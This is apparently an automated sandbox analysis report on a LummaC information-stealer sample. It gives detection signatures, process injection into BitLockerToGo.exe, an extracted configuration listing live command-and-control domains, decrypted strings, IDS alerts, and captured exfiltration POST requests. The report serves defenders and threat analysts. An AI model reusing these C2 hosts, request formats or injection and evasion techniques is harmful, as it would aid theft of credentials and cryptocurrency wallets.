Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe
Analysis ID:	1532747
MD5:	2e1e5df2401546676205befe6668ed88
SHA1:	469e34d2392c6ee4837fbcb15dca74c83b1246cc
SHA256:	15de8f29eaf5dbf78c94318c11f87e519380c66d094966113bb56622faf5152f
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe" MD5: 2E1E5DF2401546676205BEFE6668ED88)

BitLockerToGo.exe (PID: 3904 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["locatedblsoqp.shop", "nippydxmnwquo.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "condedqpwqm.shop", "stagedchheiqwo.shop"], "Build id": "XWVnVB--land1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1722084290.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1695494389.000000000205A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1722084290.000000000205A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.BitLockerToGo.exe.26c0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.399474+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49704	188.114.97.3	443	TCP
2024-10-13T21:34:57.700028+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49706	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.613740+0200	2055474	1	A Network Trojan was detected	192.168.2.8	55171	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.457364+0200	2055475	1	A Network Trojan was detected	192.168.2.8	59587	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.470727+0200	2055477	1	A Network Trojan was detected	192.168.2.8	50525	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.406570+0200	2055479	1	A Network Trojan was detected	192.168.2.8	50841	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.482826+0200	2055480	1	A Network Trojan was detected	192.168.2.8	52207	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.590397+0200	2055481	1	A Network Trojan was detected	192.168.2.8	59565	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.602404+0200	2055482	1	A Network Trojan was detected	192.168.2.8	54706	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.444032+0200	2055483	1	A Network Trojan was detected	192.168.2.8	61114	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:55.399474+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49704	188.114.97.3	443	TCP
2024-10-13T21:34:57.700028+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49706	172.67.206.204	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:34:56.882116+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.8	49705	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: locatedblsoqp.shop	URL Reputation: Label: phishing
Source: caffegclasiqwp.shop	URL Reputation: Label: malware
Source: condedqpwqm.shop	URL Reputation: Label: phishing
Source: millyscroqwp.shop	URL Reputation: Label: malware
Source: stamppreewntnq.shop	URL Reputation: Label: phishing
Source: stagedchheiqwo.shop	URL Reputation: Label: phishing
Source: traineiwnqo.shop	URL Reputation: Label: malware
Source: https://locatedblsoqp.shop/api	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 2.2.BitLockerToGo.exe.26c0000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "nippydxmnwquo.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "condedqpwqm.shop", "stagedchheiqwo.shop"], "Build id": "XWVnVB--land1"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: nippydxmnwquo.shop
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp	String decryptor: XWVnVB--land1

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.8:49706 version: TLS 1.2

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000002.1722084290.0000000002014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000002.1722084290.0000000002014000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_026CB810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	2_2_026CC69D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	2_2_026FBC78
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	2_2_026CCC80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_026D3A50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_026D22E6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	2_2_026EA2E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_026FF290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_026E7B30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ecx], ax	2_2_026DDBEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_026E3BE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_026FE390
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_026DF862
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	2_2_026D3846
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	2_2_026DE850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_026DE850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]	2_2_026FA830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	2_2_026CC000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_026F90C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_026FE8D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_026DF8B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_026DF8B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_026D3888
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_026FE080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_026D5172
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_026D5172
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-24h]	2_2_026D5172
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_026DD940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_026F1950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	2_2_026FF9E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	2_2_026E11B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	2_2_026E866E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	2_2_026E866E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	2_2_026E866E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+18h]	2_2_026E866E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	2_2_026E866E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_026DC660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_026D5E62
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	2_2_026C3E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_026E4640
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	2_2_026DE6C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_026DE6C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_026FA796
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_026FDF90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_026FD470
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_026FDC70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_026DC400
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	2_2_026DE411
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_026D04D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	2_2_026CF578
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	2_2_026DCDED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h	2_2_026DCDED

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055481 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop) : 192.168.2.8:59565 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.8:59587 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.8:50841 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055474 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop) : 192.168.2.8:55171 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055480 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) : 192.168.2.8:52207 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.8:61114 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055477 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) : 192.168.2.8:50525 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.8:54706 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49705 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: nippydxmnwquo.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nippydxmnwquo.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: nippydxmnwquo.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop
Source: global traffic	DNS traffic detected: DNS query: condedqpwqm.shop
Source: global traffic	DNS traffic detected: DNS query: evoliutwoqm.shop
Source: global traffic	DNS traffic detected: DNS query: millyscroqwp.shop
Source: global traffic	DNS traffic detected: DNS query: stagedchheiqwo.shop
Source: global traffic	DNS traffic detected: DNS query: stamppreewntnq.shop
Source: global traffic	DNS traffic detected: DNS query: caffegclasiqwp.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nippydxmnwquo.shop

Source: BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.stea
Source: BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered:
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic
